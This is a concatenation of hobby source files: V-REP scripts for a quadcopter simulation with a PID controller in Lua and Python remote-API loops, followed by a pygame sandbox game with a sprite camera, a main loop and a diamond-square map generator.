                entity = Entity(type='Gate', name=key, x1=position2[0], y1=position2[1], x2=position3[0], y2=position3[1])
            else:
                # NOTE(review): on this branch `entity` is not reassigned, so
                # the append below re-appends the previous entity (or raises
                # NameError on the first iteration) — confirm the mapping
                # above stays exhaustive.
                print (key, value)
            entities.append(entity)
        ##########
        search = Search(entities, clientID)
        search.build(divided = 10)
        #search.draw(type='B')
        search.search()
        search.draw(type='D')
        # Before closing the connection to V-REP, make sure that the last command sent out had time to arrive. You can guarantee this with (for example):
        vrep.simxGetPingTime(clientID)
        # Now close the connection to V-REP:
        vrep.simxFinish(clientID)
    else:
        print ('Failed connecting to remote API server')
    print ('Program ended')
--- FILE SEPARATOR ---
function sysCall_init()
    -- One-time setup for the quadcopter scene: object handles, controller
    -- state, particle parameters, camera views and grab-mission bookkeeping.
    -- Make sure we have version 2.4.13 or above (the particles are not supported otherwise)
    v=sim.getInt32Parameter(sim.intparam_program_version)
    if (v<20413) then
        sim.displayDialog('Warning','The propeller model is only fully supported from V-REP version 2.4.13 and above.&&nThis simulation will not run as expected!',sim.dlgstyle_ok,false,'',nil,{0.8,0,0,0,0,0})
    end
    -- Detatch the manipulation sphere:
    targetObj=sim.getObjectHandle('Quadricopter_target')
    sim.setObjectParent(targetObj,-1,true)
    -- This control algo was quickly written and is dirty and not optimal. It just serves as a SIMPLE example
    d=sim.getObjectHandle('Quadricopter_base')
    hand_handle=sim.getObjectHandle('JacoHand')
    quadricopter=sim.getObjectHandle('Quadricopter')
    quadricopter_prop_respondable1=sim.getObjectHandle('Quadricopter_propeller_respondable1')
    -- Propagate the particle display/simulation flags to the whole script tree.
    particlesAreVisible=sim.getScriptSimulationParameter(sim.handle_self,'particlesAreVisible')
    sim.setScriptSimulationParameter(sim.handle_tree,'particlesAreVisible',tostring(particlesAreVisible))
    simulateParticles=sim.getScriptSimulationParameter(sim.handle_self,'simulateParticles')
    sim.setScriptSimulationParameter(sim.handle_tree,'simulateParticles',tostring(simulateParticles))
    propellerScripts={-1,-1,-1,-1}
    for i=1,4,1 do
        propellerScripts[i]=sim.getScriptHandle('Quadricopter_propeller_respondable'..i)
    end
    heli=sim.getObjectAssociatedWithScript(sim.handle_self)
    hand_script_handle = sim.getScriptHandle('JacoHand')
    print('hand_script_handle', hand_script_handle)
    -- Controller gains and accumulators (vertical PID + attitude terms).
    particlesTargetVelocities={0,0,0,0}
    pParam=6
    iParam=0.04
    dParam=0.08
    vParam=-2
    cumul=0
    lastE=0
    pAlphaE=0
    pBetaE=0
    alphaCumul=0
    betaCumul=0
    rotCorrCumul=0
    psp2=0
    psp1=0
    spCumul=0
    prevEuler=0
    maxCorr=0
    deltax=0
    deltay=0
    fakeShadow=sim.getScriptSimulationParameter(sim.handle_self,'fakeShadow')
    if (fakeShadow) then
        shadowCont=sim.addDrawingObject(sim.drawing_discpoints+sim.drawing_cyclic+sim.drawing_25percenttransparency+sim.drawing_50percenttransparency+sim.drawing_itemsizes,0.2,0,-1,1)
    end
    -- Prepare 2 floating views with the zed camera views:
    zed_vision0 = sim.getObjectHandle('zed_vision0')
    zed_vision1 = sim.getObjectHandle('zed_vision1')
    zed_v0_View=sim.floatingViewAdd(0.9,0.9,0.2,0.2,0)
    zed_v1_View=sim.floatingViewAdd(0.7,0.9,0.2,0.2,0)
    sim.adjustView(zed_v0_View,zed_vision0,64)
    sim.adjustView(zed_v1_View,zed_vision1,64)
    -- Grab-mission state (largely unused while the decision logic below and
    -- in sysCall_actuation stays commented out).
    end_vector = {0,0,0.14}
    t_sim_start = sim.getSimulationTime()
    grapped = false
    speed = -1 -- m/s
    hold_time = 0.5 -- s
    distance_hold = 0.11
    start_position = sim.getObjectPosition(targetObj, -1)
    ----- the commented part is the decision logic to grap a 'Sphere'
    --hold_target_handle = sim.getObjectHandle('Sphere')
    --hold_target_position = sim.getObjectPosition(hold_target_handle, -1)
    targetPos=sim.getObjectPosition(targetObj,-1)
end
function sysCall_cleanup()
    -- Release resources created in sysCall_init: the shadow drawing object
    -- and the two floating camera views.
    -- NOTE(review): shadowCont is only created when fakeShadow is enabled;
    -- confirm removal is safe (or guarded elsewhere) when it is not.
    sim.removeDrawingObject(shadowCont)
    sim.floatingViewRemove(zed_v0_View)
    sim.floatingViewRemove(zed_v1_View)
end
function sysCall_actuation()
    -- Per-step control: move the target object, draw the fake shadow, run
    -- the vertical PID and attitude controllers, and periodically derive a
    -- lateral correction from the zed camera image.
    s=sim.getObjectSizeFactor(d)
    pos=sim.getObjectPosition(d,-1)
    target_pos = sim.getObjectPosition(targetObj, -1)
    -- z_distance = target_pos[3] - hold_target_position[3]
    -- print('z_distance', z_distance)
    -- if (math.abs(z_distance) < 0.21) then
    --     sim.setScriptSimulationParameter(hand_script_handle, 'close_hand', 'true')
    --     print('Closing hand')
    -- end
    -- print('simulation time', sim.getSimulationTime())
    pos_z_delta = 0
    -- if grapped == false then
    --     if (z_distance > distance_hold) then
    --         pos_z_delta = speed * sim.getSimulationTimeStep()
    --         hold_start_time = sim.getSimulationTime()
    --         print('start', pos_z_delta)
    --     elseif z_distance < distance_hold then
    --         hold for a while
    --         if (sim.getSimulationTime() - hold_start_time) > hold_time then
    --             grapped = true
    --             speed = 1
    --         end
    --     end
    -- else
    --     end_delta = start_position[3] - target_pos[3]
    --     if (end_delta > 0.01) then
    --         pos_z_delta = speed * sim.getSimulationTimeStep()
    --     end
    -- end
    sim.setObjectPosition(targetObj, -1, {target_pos[1], target_pos[2], target_pos[3] + pos_z_delta})
    if (fakeShadow) then
        itemData={pos[1],pos[2],0.002,0,0,1,0.2*s}
        sim.addDrawingObjectItem(shadowCont,itemData)
    end
    ------------------ Controller -------------------------------------
    -- Vertical control:
    -- landing down: sink the setpoint while it is above 1 m
    if(targetPos[3]>1)then
        targetPos[3] = targetPos[3] - 0.01
    end
    pos=sim.getObjectPosition(d,-1)
    l=sim.getVelocity(heli)
    e_z=(targetPos[3]-pos[3])
    cumul=cumul+e_z
    -- PID on altitude plus a damping term on vertical velocity (vParam < 0).
    thrust=9+pParam*e_z+iParam*cumul+dParam*(e_z-lastE)+l[3]*vParam
    lastE=e_z
    -- Rotational control:
    euler=sim.getObjectOrientation(d,targetObj)
    linearSpeed, angularSpeed=sim.getObjectVelocity(d)
    alphaCorr=0
    -- maxCorr counts down 0.02 per step; on underflow the vision estimate is
    -- refreshed and the counter resets to 0.2 (a 10-step cycle).
    maxCorr=maxCorr-0.02
    if(maxCorr < 0) then
        maxCorr = 0.2
        ------------------ Visual -------------------------------------
        -- Scan the zed image for near-white pixels and estimate the blob's
        -- normalized offset (deltax, deltay) from the image centre.
        imageBuffer = sim.getVisionSensorImage(zed_vision0)
        print(#imageBuffer)
        maxx=0
        minx=100000
        maxy=0
        miny=100000
        maxd=0
        xlen = 1280
        ylen = 2160
        ylock = 0
        out = {}
        for i=1,xlen,2 do
            maxy2=0
            miny2=100000
            for j=100,ylen-100,30 do
                if (imageBuffer[i*ylen+j]>0.9 and imageBuffer[i*ylen+j+1]>0.9 and imageBuffer[i*ylen+j+2]>0.9) then
                    maxx=math.max(maxx,i)
                    minx=math.min(minx,i)
                    maxy2=math.max(maxy2,j)
                    miny2=math.min(miny2,j)
                end
            end
            if(maxy2 - miny2 < 10000 and maxy2 - miny2 > maxd) then
                maxd = maxy2 - miny2;
                maxy = maxy2;
                miny = miny2;
            end
        end
        print(maxx,minx,maxy,miny);
        if(minx < 10000)then
            deltax = (maxx + minx)/2/xlen-0.5;
        end
        if(miny < 10000) then
            deltay = (maxy + miny)/2/ylen-0.5;
        end
        print(deltax,deltay);
    end
    -- NOTE(review): this overwrites the vision-derived deltax on every pass;
    -- it looks like a debugging override -- confirm whether it is intended.
    deltax = 1
    -- Phase the lateral nudge by where maxCorr is in its countdown cycle.
    if(maxCorr > 0.15) then
        deltaSpeed = 0.1*deltax
    elseif(maxCorr > 0.05) then
        deltaSpeed = 0
    elseif(maxCorr > 0) then
        deltaSpeed = -0.1*deltax
    else
        deltaSpeed = 0
    end
    print(deltaSpeed)
    alphaCumul = alphaCumul + euler[1] + deltaSpeed
    alphaCorr=0.00323 + euler[1]*0.225 + 1.4*(euler[1]-pAlphaE)-- + 0.005 * alphaCumul
    pAlphaE=euler[1] + deltaSpeed
    betaCumul = betaCumul + euler[2]
    betaCorr=euler[2]*0.225 + 1.4*(euler[2]-pBetaE)-- + 0.001 * betaCumul
    pBetaE=euler[2]
    rotCorrCumul = rotCorrCumul + euler[3]
    rotCorr=euler[3]*4 + 1*(euler[3]-prevEuler) + 0.001 * rotCorrCumul
    prevEuler=euler[3]
    -- Decide of the motor velocities:
    particlesTargetVelocities[1]=thrust*(1-alphaCorr+betaCorr+rotCorr)
    particlesTargetVelocities[2]=thrust*(1-alphaCorr-betaCorr-rotCorr)
    particlesTargetVelocities[3]=thrust*(1+alphaCorr-betaCorr+rotCorr)
    particlesTargetVelocities[4]=thrust*(1+alphaCorr+betaCorr-rotCorr)
    -- Send the desired motor velocities to the 4 rotors:
    for i=1,4,1 do
        sim.setScriptSimulationParameter(propellerScripts[i],'particleVelocity',particlesTargetVelocities[i])
    end
end
--- FILE SEPARATOR ---
import numpy as np
import vrep
# Repeatedly (up to 50 times) connect to the local V-REP remote-API server,
# run one synchronous simulation pass, then shut everything down.
# NOTE(review): the raise below propagates (the try has no except clause),
# so the first failed connection aborts the whole loop after `finally` runs.
for i in range(50):
    try:
        # close any open connections
        vrep.simxFinish(-1)
        # Connect to the V-REP continuous server
        clientID = vrep.simxStart('127.0.0.1', 19997, True, True, 500, 5)
        if clientID != -1: # if we connected successfully
            print ('Connected to remote API server')
            # --------------------- Setup the simulation
            vrep.simxSynchronous(clientID,True)
            dt = .025
            vrep.simxSetFloatingParameter(clientID,
                                          vrep.sim_floatparam_simulation_time_step,
                                          dt, # specify a simulation time step
                                          vrep.simx_opmode_oneshot)
            # start our simulation in lockstep with our code
            vrep.simxStartSimulation(clientID,
                                     vrep.simx_opmode_blocking)
            count = 0
            track_hand = []
            track_target = []
            # count accumulates dt of simulated time per trigger, so this
            # runs for 60 simulated seconds (2400 steps).
            while count < 60:
                # move simulation ahead one time step
                vrep.simxSynchronousTrigger(clientID)
                count += dt
            # stop the simulation
            vrep.simxStopSimulation(clientID, vrep.simx_opmode_blocking)
            # Before closing the connection to V-REP,
            # make sure that the last command sent out had time to arrive.
            vrep.simxGetPingTime(clientID)
            # Now close the connection to V-REP:
            vrep.simxFinish(clientID)
        else:
            raise Exception('Failed connecting to remote API server')
    finally:
        # stop the simulation
        vrep.simxStopSimulation(clientID, vrep.simx_opmode_blocking)
        # Before closing the connection to V-REP,
        # make sure that the last command sent out had time to arrive.
        vrep.simxGetPingTime(clientID)
        # Now close the connection to V-REP:
        vrep.simxFinish(clientID)
        print('connection closed...')
|
[
"/entity.py",
"/mission_path_planning_main.py",
"/old_code/5有视觉横向调试.py",
"/repeat.py"
] |
000Evgeniy000/pygame-sandbox
|
import random
def singleton(cls):
    """Class decorator: every call of the decorated class yields one shared instance."""
    instances = {}

    def getinstance():
        # Construct lazily on first use, then always hand back the same object.
        try:
            return instances[cls]
        except KeyError:
            instances[cls] = cls()
            return instances[cls]
    return getinstance
def div_by_zero(x, y):
    """Division that yields 0 instead of raising when the divisor is 0."""
    return 0 if y == 0 else x / y
def limited_inc(base, limit, inc=1):
    """Return base + inc, capped at limit."""
    return min(base + inc, limit)
def random_mod(x, a):
    """Scale x by a random percentage drawn uniformly from [-a, a)."""
    percent = random.randrange(-a, a)
    return x * (1 + float(percent) / 100)
--- FILE SEPARATOR ---
import pygame
from functions import singleton
@singleton
class ImageStorage(object):
    """Singleton cache of sprite sheets, keyed by a short name.

    Each entry is a 2-D table of pygame Surfaces: cache[key][tile_x][tile_y].
    """

    def __init__(self):
        self.cache = {}
        self.load('images/Actor1.png',32,32,'actor1')
        self.load('images/Actor2.png',32,32,'actor2')
        self.load('images/Actor3.png',32,32,'actor3')
        self.load('images/Evil.png',32,32,'evil')
        self.load('images/exit.png',19,20,'icon-exit')
        self.load('images/craft.png',20,20,'icon-craft')
        self.load('images/backpack.png',20,20,'icon-backpack')
        self.load('images/1.png',30,30,'flower')
        self.load('images/tilee4.png',30,30,'plants')
        self.load('images/tilee4_2.png',30,30,'plants_2')

    def __getitem__(self, key):
        return self.cache[key]

    def load(self,filename,width,height,key):
        # Load a sheet, slice it into width x height tiles, and cache it.
        self.cache[key] = self.__load_tile_table(filename,width,height)

    def __load_tile_table(self, filename, width, height):
        """Load an image and split it into tiles."""
        image = pygame.image.load(filename).convert_alpha()
        image_width, image_height = image.get_size()
        tile_table = []
        # BUG FIX: the original used plain / in range(); on Python 3 that
        # produces a float and range() raises TypeError. Floor division is
        # identical for these int pixel sizes on Python 2 as well.
        for tile_x in range(0, image_width // width):
            line = []
            tile_table.append(line)
            for tile_y in range(0, image_height // height):
                rect = (tile_x*width, tile_y*height, width, height)
                line.append(image.subsurface(rect))
        return tile_table
@singleton
class Camera(object):
    """Singleton viewport mapping world (logic) coordinates to screen coordinates.

    Keeps the tracked position centred while clamping the view to the world
    bounds.
    """

    def __init__(self):
        self.dx = 0
        self.dy = 0
        self.screen_width = 600
        self.screen_height = 600
        self.world_width = 12900
        self.world_height = 12900
        # TODO: get world size from the map class instead of hard-coding it
        self.update((1220,1230))

    def update(self, pos):
        # pos: (x, y) logic coords of the player (he is in the screen centre).
        # BUG FIX (syntax): the original used the Python-2-only tuple
        # parameter "def update(self,(x,y))"; callers still pass one tuple.
        x, y = pos
        # BUG FIX (logic): the original computed max(..., 0) and then
        # overwrote it with min(...), discarding the lower clamp, so the
        # camera origin could go negative near the world's left/top edge.
        start_x = min(max(x - self.screen_width / 2, 0),
                      self.world_width-self.screen_width)
        start_y = min(max(y - self.screen_height / 2, 0),
                      self.world_height-self.screen_height)
        self.dx = start_x
        self.dy = start_y

    def coord_transform(self, pos):
        # logic to screen
        x, y = pos
        return (x-self.dx,y-self.dy)

    def coord_transform_x(self,x):
        return x-self.dx

    def coord_transform_y(self,y):
        return y-self.dy
class Character_Sprite(pygame.sprite.Sprite):
    """Animated four-direction character sprite driven by a logic-layer object.

    `self.data` is expected to expose get_pos() returning logic coordinates;
    the sprite infers its facing direction from the movement delta between
    consecutive updates.
    """
    # Column indices into a tile row for each facing direction.
    GO_TOP = 3
    GO_LEFT = 1
    GO_RIGHT= 2
    GO_BOTTOM=0

    def __init__(self,image_sourse,x=0,y=0):
        pygame.sprite.Sprite.__init__(self)
        self.data = None
        self.pred_data_x = 0
        self.pred_data_y = 0
        self.frames = ImageStorage()[image_sourse][0:3]
        # slice needed if the sheet contains more than one character
        self.frames.append(self.frames[1])
        # duplicate the centre frame so the 4-step walk cycle loops smoothly
        self.image = self.frames[0][0]
        self.rect = self.image.get_rect()
        self.rect.x = x
        self.rect.y = y
        self.frame = 0
        self.orientation = self.GO_BOTTOM

    def update(self,animate=False):
        # NOTE(review): hasattr is always true here (data is set to None in
        # __init__), so a sprite whose data was never assigned will crash on
        # get_pos() — confirm data is always bound before the first update.
        if hasattr(self,'data'):
            x,y = self.data.get_pos()
            # Facing direction from the move delta since the previous update.
            dx = x - self.pred_data_x
            dy = y - self.pred_data_y
            a = 1 # tolerance around zero
            if dx > a:
                self.orientation = self.GO_RIGHT
            if dx < -a:
                self.orientation = self.GO_LEFT
            if -a <= dx <= a:
                if dy >= 0:
                    self.orientation = self.GO_BOTTOM
                if dy < 0:
                    self.orientation = self.GO_TOP
            self.pred_data_x = x
            self.pred_data_y = y
            x,y = Camera().coord_transform((x,y))
            if animate:
                self.image = self.frames[self.frame][self.orientation]
                self.frame += 1
                self.frame = self.frame % 4
            self.rect.x = round(x)
            self.rect.y = round(y)
--- FILE SEPARATOR ---
import pygame
from model import Game
import time
import ui
# Bootstrap pygame, build the UI controller, then run the main loop:
# poll input -> advance the game model -> redraw the visible panels.
pygame.init()
resolution = (600, 600)
clock = pygame.time.Clock()
screen = pygame.display.set_mode(resolution)
uic = ui.UiController()
ui_event = ui.Event()
uic.go_to_main_menu()
running = True
while running:
    clock.tick(Game().fps)
    if not Game().paused:
        Game().counter = (Game().counter + 1) % Game().fps
    #############events#######################
    # Key scancodes: w=119, s=115, d=100, a=97; 273-276 are the arrow keys.
    # Movement is forwarded to the UI layer as USEREVENTs.
    keys = pygame.key.get_pressed()
    if keys[119] or keys[273]:
        pygame.event.post(pygame.event.Event(pygame.USEREVENT,
                                             direct='up',
                                             code='keyboard direct'))
    if keys[115] or keys[274]:
        pygame.event.post(pygame.event.Event(pygame.USEREVENT,
                                             direct='down',
                                             code='keyboard direct'))
    if keys[100] or keys[275]:
        pygame.event.post(pygame.event.Event(pygame.USEREVENT,
                                             direct='right',
                                             code='keyboard direct'))
    if keys[97] or keys[276]:
        pygame.event.post(pygame.event.Event(pygame.USEREVENT,
                                             direct='left',
                                             code='keyboard direct'))
    if pygame.mouse.get_pressed()==(1,0,0):#drag without mousemotion
        pygame.event.post(pygame.event.Event(pygame.USEREVENT,
                                             pos=pygame.mouse.get_pos(),
                                             code='mouse direct'))
    for event in pygame.event.get():
        ui_event.get_pygame_event(event)
        uic.do_action(ui_event)
        if event.type == pygame.QUIT:
            running = False
    #############logic########################
    if not Game().paused:
        Game().step()
    #############draw#######################
    # Panels are blitted back-to-front so the frontmost panel ends on top.
    for panel in reversed(uic.visible_panels):
        screen.blit(panel.draw(), (panel.left,panel.top))
    pygame.display.flip()
'''
test_stats = {'hp': 100,
'mp': 30,
'armor': 0,
'damage': 40,
'delay': 2,
'x': 15,
'y': 20,
'level':1
}
c = model.FightUnit('player',**test_stats)
d = model.FightUnit('monster1',**test_stats)
e = model.FightUnit('monster2',**test_stats)
fight = d.begin_fight(c)
e.set_active_target(c)
fight.add_fighter(e)
while fight.is_active():
print fight
fight.step()
print '\n'
'''
pygame.quit()
--- FILE SEPARATOR ---
import random
from functions import limited_inc
from functions import random_mod
from functions import div_by_zero
class MapStorage(object):
    """Cache of generated maps keyed by map name.

    A stored map is a 2-D list of cells; each cell is either a plain height
    value or a ``square_size`` x ``square_size`` sub-grid (a "deepened"
    cell). Scalar cells are expanded lazily on first detailed access.
    """
    def __init__(self):
        self.cache = {}
        # Edge length of the sub-grid a scalar cell expands into.
        self.square_size = 4
    def __getitem__(self, key):
        """Return the cached table for `key`, deepening a scalar entry once."""
        if isinstance(self.cache[key], list):
            return self.cache[key]
        # BUG FIX: was a bare `deepen(...)` call (NameError at runtime);
        # the helper is a method of this class.
        table = self.deepen(self.cache[key])
        self.cache[key] = table
        return table
    def storage_map(self, map_name, map_data):
        """Store a shallow copy of `map_data` under `map_name`."""
        self.cache[map_name] = map_data[:]
    def deepen(self, value, objects=()):
        """Return a square_size x square_size grid filled with `value`.

        `objects` is kept for interface compatibility but is unused
        (the old default was a mutable list; a tuple avoids the shared-
        default pitfall).
        """
        return [[value] * self.square_size for _ in range(self.square_size)]
    def get_data(self, x, y, map_name='qwerty1'):
        """Return the value at logic coords (x, y) of map `map_name`.

        The enclosing cell is deepened in place on first access, so every
        cell addressed through here ends up as a sub-grid.
        (A leftover Py2 debug `print` was removed here.)
        """
        x_index = int(x / self.square_size)
        y_index = int(y / self.square_size)
        x = int(x % self.square_size)
        y = int(y % self.square_size)
        table = self[map_name]
        square = table[y_index][x_index]
        if not isinstance(square, list):
            square = self.deepen(square)
            table[y_index][x_index] = square
        return square[y][x]
class Map:
    """Procedurally generated world map (singleton).

    Holds a width x height grid of height values produced by the
    diamond-square algorithm, a waterline (median height), and a dict of
    resource/enemy objects planted on walkable (above-water) tiles.
    """
    # The 8 surrounding cell offsets, clockwise from north.
    neighbour = [(-1,0),
                 (-1,1),
                 (0,1),
                 (1,1),
                 (1,0),
                 (1,-1),
                 (0,-1),
                 (-1,-1)]
    #(code,quantity)
    objects = [(101,3),(102,1),
               (201,1),
               (301,5),(302,7),(303,9),
               (401,3),(402,6),(403,4),(404,4)]
    def __new__(cls):
        # Singleton: reuse the one instance across all Map() calls.
        # BUG FIX: was `super(Game, cls)` — `Game` is not defined in this
        # module, so the first instantiation raised NameError.
        if not hasattr(cls, 'instance'):
            cls.instance = super(Map, cls).__new__(cls)
        return cls.instance
    def __init__(self):
        # NOTE(review): __init__ runs on *every* Map() call even though
        # __new__ returns the shared instance, so each call regenerates
        # the world — confirm this is intended before adding Map() calls.
        self.storage = MapStorage()
        self.counter = 0
        self.generate()
    def generate(self):
        """Build a fresh 33x33 height map, pick the waterline, and plant
        resources/enemies on land tiles."""
        self.width = 33
        self.height = 33
        self.waterline = 0
        self.map = []
        self.objects_on_map = {}
        self.counter += 1
        self.name = 'qwerty' + str(self.counter)
        self.__create_empty_map()
        #self.__generate_caves_and_routes(10)
        self.__diamond_square()
        self.walkable_coords = self.__pack()
        self.__place_for_something = self.walkable_coords[:]
        self.storage.storage_map(self.name, self.map)
        self.__plant_resourses_and_enemies(self.objects)
    def __create_empty_map(self):
        """Fill self.map with height x width zeros."""
        for y in range(0, self.height):
            map_row = []
            for x in range(0, self.width):
                r = 0
                map_row.append(r)
            self.map.append(map_row)
    def __smoothen(self):
        """A simple blurring function for the map. Gets rid of unwanted
        sharpness such as a single sand tile in the middle of a bunch
        of grass, etc."""
        # NOTE(review): the orthogonal neighbours use `< width-1` bounds
        # while the diagonals use `< width` — looks inconsistent; left
        # unchanged to preserve the generated terrain.
        for y in range(0, self.height):
            for x in range(0, self.width):
                average = 0.0
                times = 0.0
                if x - 1 >= 0:
                    average += self.map[y][x-1]
                    times += 1
                if x + 1 < self.width-1:
                    average += self.map[y][x+1]
                    times += 1
                if y - 1 >= 0:
                    average += self.map[y-1][x]
                    times += 1
                if y + 1 < self.height-1:
                    average += self.map[y+1][x]
                    times += 1
                if x - 1 >= 0 and y - 1 >= 0:
                    average += self.map[y-1][x-1]
                    times += 1
                if x + 1 < self.width and y - 1 >= 0:
                    average += self.map[y-1][x+1]
                    times += 1
                if x - 1 >= 0 and y + 1 < self.height:
                    average += self.map[y+1][x-1]
                    times += 1
                if x + 1 < self.width and y + 1 < self.height:
                    average += self.map[y+1][x+1]
                    times += 1
                average += self.map[y][x]
                times += 1
                average /= times
                self.map[y][x] = average
    def __get_waterline(self):
        """Return the median of all height values (50th percentile)."""
        values = []
        for y in range(0, self.height):
            for x in range(0, self.width):
                values.append(self.map[y][x])
        values.sort()
        return values[int((len(values)-1)*.50)]
    def __pack(self):
        """Return the (y, x) coords of every tile above the waterline."""
        res = []
        for y in range(0, self.height):
            for x in range(0, self.width):
                if self.map[y][x] > self.waterline:
                    res.append((y,x))
        return res
    def __plant_something(self,something=5):
        """Record object code `something` at a random walkable tile."""
        place = random.choice(self.__place_for_something)
        y,x = place
        # Keyed as (x, y) — the UI reads this dict with x first.
        self.objects_on_map[(x,y)] = something
        #don't use setpoint! keep this data in another variable
        #if self._set_point(y,x,something):
        #    self._place_for_something.remove(place)
    def __random_points(self,count_of_points=1):
        """random coords in map"""
        points = []
        for i in range(count_of_points):
            y = random.randrange(self.height-1)
            x = random.randrange(self.width-1)
            points.append((y,x))
        return points
    def __set_point(self,y,x,value):
        """Set map[y][x]; wrap out-of-range coords. True if no wrap needed."""
        try:
            self.map[y][x] = value
            return True
        except IndexError:  # was a bare except; only IndexError is expected
            self.__set_point_2(y,x,value)
            return False
    def __set_point_2(self,y,x,value):
        """Fallback for __set_point: fold oversized coords back in range."""
        if y >= self.height-1:
            y = y % (self.height - 1)
        if x >= self.width-1:
            x = x % (self.width - 1)
        self.map[y][x] = value
    def __get_point(self,y,x):
        """Return map[y][x]; out-of-range reads yield random noise so the
        diamond-square edges still get plausible values."""
        try:
            return self.map[y][x]
        except IndexError:  # was a bare except
            return random.random()
    def __diamond_square(self):
        """Run diamond-square over the grid, smooth it, rescale to 0..255,
        and derive the waterline."""
        self.map[0][0] = random.random()
        self.map[0][self.width-1] = random.random()
        self.map[self.height-1][0] = random.random()
        self.map[self.height-1][self.width-1] = random.random()
        squares = [(0,0)] #y1,x1
        a = self.width-1
        while a > 1:
            # Explicit floor division: under true division `a` would become
            # a float and the index arithmetic below would break.
            a = a // 2
            diamonds = self.__square(squares,a)
            squares = self.__diamond(diamonds,a)
        self.__smoothen()
        # Square the normalized heights to bias toward lowlands, scale to 255.
        for y in range(0, self.height):
            for x in range(0, self.width):
                self.map[y][x] = self.map[y][x] * self.map[y][x] * 255
        self.waterline = self.__get_waterline()
    def __square(self,squares,a):
        """Square step: set each square's centre to the jittered corner mean."""
        diamonds = []
        for square in squares:
            y1,x1 = square
            mid = (self.__get_point(y1,x1)
                   + self.__get_point(y1,x1+2*a)
                   + self.__get_point(y1+2*a,x1)
                   + self.__get_point(y1+2*a,x1+2*a)
                   ) / 4
            self.__set_point(y1+a,x1+a,random_mod(mid,a//10+10))
            diamonds.append((y1+a,x1+a))
        return diamonds
    def __diamond(self,diamonds,a):
        """Diamond step: fill the four edge midpoints around each centre."""
        squares = []
        for diamond in diamonds:
            y,x = diamond
            left = (self.__get_point(y,x)
                    + self.__get_point(y-a,x-a)
                    + self.__get_point(y,x-2*a)
                    + self.__get_point(y+a,x-a)
                    ) / 4
            self.__set_point(y,x-a,random_mod(left,a//10+10))
            squares.append((y,x-a))
            right = (self.__get_point(y,x)
                     + self.__get_point(y-a,x+a)
                     + self.__get_point(y,x+2*a)
                     + self.__get_point(y+a,x+a)
                     ) / 4
            self.__set_point(y,x+a,random_mod(right,a//10+10))
            # NOTE(review): appends (y,x) although the point written was
            # (y,x+a); likewise (y-a,x-a) below vs. (y+a,x). Possibly
            # intentional seed coords for the next square pass — left as-is.
            squares.append((y,x))
            top = (self.__get_point(y,x)
                   + self.__get_point(y-a,x-a)
                   + self.__get_point(y-2*a,x)
                   + self.__get_point(y-a,x+a)
                   ) / 4
            self.__set_point(y-a,x,random_mod(top,a//10+10))
            squares.append((y-a,x))
            bottom = (self.__get_point(y,x)
                      + self.__get_point(y+a,x-a)
                      + self.__get_point(y+2*a,x)
                      + self.__get_point(y+a,x+a)
                      ) / 4
            self.__set_point(y+a,x,random_mod(bottom,a//10+10))
            squares.append((y-a,x-a))
        return squares
    def __generate_caves_and_routes(self,count_of_points=1):
        """Dig `count_of_points` caves and connect consecutive ones (unused:
        see the commented call in generate())."""
        cave_centers = self.__random_points(count_of_points)
        predx = -1
        predy = -1
        for point in cave_centers:
            y,x = point
            if predx > 0:
                self.__dig_route((predy,predx),point)
            self.__dig_cave(y,x)
            self.__set_point(y,x,200)
            predy,predx = point
    def __dig_cave(self,start_y,start_x,size=100):
        """Mark the 8 neighbours of (start_y, start_x) as cave (value 200).

        `size` is accepted but currently unused.
        """
        x = start_x
        y = start_y
        for point in self.neighbour:
            dy,dx = point
            self.__set_point(y+dy,x+dx,200)
    def __dig_route(self,start,finish):
        """Carve a randomized staircase path (value 100) from start to finish."""
        y1,x1 = start
        y2,x2 = finish
        dy = y2 - y1
        dx = x2 - x1
        abs_dy = abs(dy)
        abs_dx = abs(dx)
        # div_by_zero yields the sign of the step (0-safe division helper).
        napr_dy = div_by_zero(dy,abs_dy)
        napr_dx = div_by_zero(dx,abs_dx)
        x = 0
        y = 0
        while (y < abs_dy) or (x < abs_dx):
            napr = random.choice(('left','right'))
            if napr == 'left':
                x = limited_inc(x,abs_dx)
            if napr == 'right':
                y = limited_inc(y,abs_dy)
            self.__set_point(y1+y*napr_dy,x1+x*napr_dx,100)
    def __plant_resourses_and_enemies(self,plant_list=()):
        """Plant `quantity` objects of each (code, quantity) pair."""
        for code,quantity in plant_list:
            for i in range(0,quantity):
                self.__plant_something(code)
--- FILE SEPARATOR ---
import random
from functions import div_by_zero
from functions import singleton
@singleton
class Game(object):
    """Global mutable game state (singleton): timing, pause flag and actors."""
    def __init__(self):
        self.paused = True
        self.counter = 0
        self.fps = 30
        self.fps_animate = 10
        # Frames between animation updates (integer 3 under Py2 division).
        self.animate_divider = self.fps / self.fps_animate
        self.player = FightUnit('4', x=120, y=130, speed=20)
        # Three wandering NPCs named '1'..'3' with decreasing speeds.
        self.npcs = [FightUnit(str(idx + 1), x=20, y=30, speed=spd)
                     for idx, spd in enumerate((4.4, 3.4, 2.4))]
        self.enviroment = []
    def step(self):
        """Advance every NPC one tick (the player is driven by input)."""
        for actor in self.npcs:
            actor.step()
class FightUnit(object):
    """An actor (player, NPC, monster) that wanders the map and can fight.

    Movement is driven by `self.program`, a generator advanced once per
    tick; assigning a new generator switches behaviour (stay / wander /
    go-to). Combat attributes such as hp/armor are expected to arrive via
    **args — TODO confirm callers always supply them before a fight.
    """
    # The 8 surrounding unit offsets used to pick a wander direction.
    neighbour = [(-1,0),
                 (-1,1),
                 (0,1),
                 (1,1),
                 (1,0),
                 (1,-1),
                 (0,-1),
                 (-1,-1)]
    def __init__(self, name, **args):
        self.name = name
        self.speed = 1
        self.x = 0.0
        self.y = 0.0
        # Default behaviour: head for the far-off point (1500, 1500).
        self.program = self.program_go_to(1500,1500)
        self.active_target = None
        self.last_enemy = None
        # Any extra keyword becomes an attribute (hp, armor, speed, ...).
        for k,v in args.items():
            setattr(self,k,v)
    def __repr__(self):
        return '\n'.join(["%s: %s" % (k,v)
                          for k,v in self.__dict__.items()])
    def step(self):
        # Py2 generator protocol; would be next(self.program) under Py3.
        self.program.next()
    def program_stay(self,ticks):
        """Behaviour: idle for ~ticks ticks, then start wandering."""
        while True:
            for i in range (1,ticks):
                yield None
            self.program = self.program_walking()
    def program_walking(self):
        """Behaviour: drift in a random direction for a random stretch;
        leaving the 0..600 box switches to heading for (1300, 1300)."""
        while True:
            dx,dy = random.choice(self.neighbour)
            s = random.randrange(100)
            for i in range (1,s):
                self.x += dx*self.speed
                self.y += dy*self.speed
                yield None
            if not 0<self.x<600:
                self.program = self.program_go_to(1300,1300)
